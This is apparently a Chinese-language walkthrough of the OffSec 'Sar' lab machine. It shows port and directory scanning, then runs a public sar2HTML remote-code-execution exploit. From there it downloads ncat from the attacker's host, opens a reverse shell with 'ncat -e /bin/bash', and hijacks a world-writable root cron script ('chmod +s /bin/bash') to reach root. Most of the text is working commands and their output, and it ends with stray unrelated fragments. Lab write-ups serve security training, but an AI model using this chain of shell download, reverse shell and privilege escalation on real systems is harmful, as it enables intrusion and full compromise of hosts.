主要知識點
- 路徑爆破
- cronjob 腳本劫持提權
具體步驟
依舊nmap 開始,開放了22和80端口
Nmap scan report for 192.168.192.35
Host is up (0.43s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 33:40:be:13:cf:51:7d:d6:a5:9c:64:c8:13:e5:f2:9f (RSA)
| 256 8a:4e:ab:0b:de:e3:69:40:50:98:98:58:32:8f:71:9e (ECDSA)
|_ 256 e6:2f:55:1c:db:d0:bb:46:92:80:dd:5f:8e:a3:0a:41 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
但是,貌似80端口沒有安裝任何服務,是一個apche2的默認頁面,不過我們這里dirb一下,發現了robots.txt,而robots.txt里包含了一個sar2HTML的路徑
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.192.35
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404,429,503,400,502
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/robots.txt (Status: 200) [Size: 9]
/server-status (Status: 403) [Size: 279]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================
打開后是一個 sar2HTML 3.2.1版本,搜索一下得到一個exp
?
?
下載后執行,得到一個遠程代碼執行的console,但是還是不夠,這里根據以往的經驗,直接上傳一個編譯好的ncat,會快很多, 也可以嘗試別的方法創建反彈shell
C:\home\kali\Documents\OFFSEC\play\DriftingBlues6\Sar> python 49344.py
Enter The url => http://192.168.192.35/sar2HTML
Command => id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Command => wget 192.168.45.212:8000/ncat -O /tmp/ncatCommand => ls -l /tmp
total 2848
-rw-r--r-- 1 www-data www-data 2914424 Nov 24 16:20 ncatCommand => chmod 777 /tmp/*Command => ls -l /tmp
total 2848
-rwxrwxrwx 1 www-data www-data 2914424 Nov 24 16:20 ncatCommand => /tmp/ncat -e /bin/bash 192.168.45.212 80而本地的nc -nlvp 80命令會收到如下
C:\home\kali\Documents\OFFSEC\play\DriftingBlues6\Sar> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.212] from (UNKNOWN) [192.168.192.35] 58986
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
上傳linpeas.sh并運行,則會發現,/var/www/html/finally.sh會每5分鐘被sudo執行一次
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh查看finally.sh會發現它實際上是調用了write.sh,
所以我們可以直接劫持write.sh來提權
www-data@sar:/tmp$ cd /var/www/html
cd /var/www/html
www-data@sar:/var/www/html$ ls -lart
ls -lart
total 40
-rw-r--r-- 1 www-data www-data 10918 Oct 20 2019 index.html
-rw-r--r-- 1 www-data www-data 21 Oct 20 2019 phpinfo.php
drwxr-xr-x 4 www-data www-data 4096 Oct 20 2019 sar2HTML
-rwxr-xr-x 1 root root 22 Oct 20 2019 finally.sh
-rw-r--r-- 1 root root 9 Oct 21 2019 robots.txt
-rwxrwxrwx 1 www-data www-data 30 Jul 24 2020 write.sh
drwxr-xr-x 3 www-data www-data 4096 Jul 24 2020 .
drwxr-xr-x 5 www-data www-data 4096 Nov 24 16:29 ..
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
#!/bin/sh./write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
#!/bin/shtouch /tmp/gateway
www-data@sar:/var/www/html$ echo "chmod +s /bin/bash" >write.sh
echo "chmod +s /bin/bash" >write.sh
www-data@sar:/var/www/html$ cat write.sh
cat write.sh
chmod +s /bin/bash
www-data@sar:/var/www/html$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1113504 Jun 7 2019 /bin/bash
www-data@sar:/var/www/html$ /bin/bash -p
/bin/bash -p
bash-4.4# cat /root/proof.txt
cat /root/proof.txt
1a75d3fc92ec05ab5ae38c2a066b5118
bash-4.4#
?
?
)
 工作原理)
嵌入式基準測試工具)
轉換為Unix(LF))
)
